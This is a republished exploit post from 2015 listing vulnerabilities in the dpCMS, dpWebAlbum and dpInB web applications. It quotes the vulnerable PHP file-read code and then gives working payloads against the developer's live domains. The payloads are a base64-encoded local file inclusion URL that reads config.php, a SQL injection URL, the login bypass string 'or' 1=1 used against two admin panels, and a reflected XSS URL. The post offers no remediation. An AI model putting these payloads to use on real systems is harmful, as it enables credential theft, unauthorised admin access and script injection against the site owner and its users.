facebook facebook twitter rss

dpCMS/dpWebAlbum/dpInB - Multiple Vulnerabilities

Author: KnocKout , Published: 30-05-2015
dpCMS/dpWebAlbum/dpInB - Multiple Vulnerabilities
###################################################################
[+] Author : KnocKout
[~] E-Mail : knockout@e-mail.com.tr
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com
###################################################################
Demo (Official): http://www.daniepaul.com
Script: https://github.com/daniepaul/dpwebalbum/tree/master/source
----------------------------------------------------------------
# dpWebAlbum -> Local File Inclusion Vulnerability
( https://github.com/daniepaul/dpwebalbum/tree/master/source )
*******************
in 'albumview.php' error lines.
<?php
$id 
base64_decode($_GET['id']);
$file "albumcovers/".$id;
if (
file_exists($file)) readfile($file);
?>

*****************
Info;
base64 must be encrypted with the local directory. there you will find the contents of source code view

Payload : http://www.daniepaul.com/albumview.php?file&id=Li4vY29uZmlnLnBocA==

---------------------------------------------------------------
# dpWebAlbum -> Remote SQL Injection
http://www.daniepaul.com/gallery.php?albummonth=12-2013 | R.C.E
----------------------------------------------------------
# dpCMS -> Admin Panel Auth Bypass
http://www.daniepaul.com/admin.php
Payload: 'or' 1=1
-----------------------------------------------------
# dpCMS -> Reflected XSS
http://www.daniepaul.com/admin.php?successmsg=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
-----------------------------------------------------

dpInB - Inventory and Billing System - Auth Bypass Vulnerability
Official: http://www.daniepaul.com/work/
DEMO : http://www.inb.daniepaul.com/
Payload: 'or' 1=1

########################################

Like us on Facebook :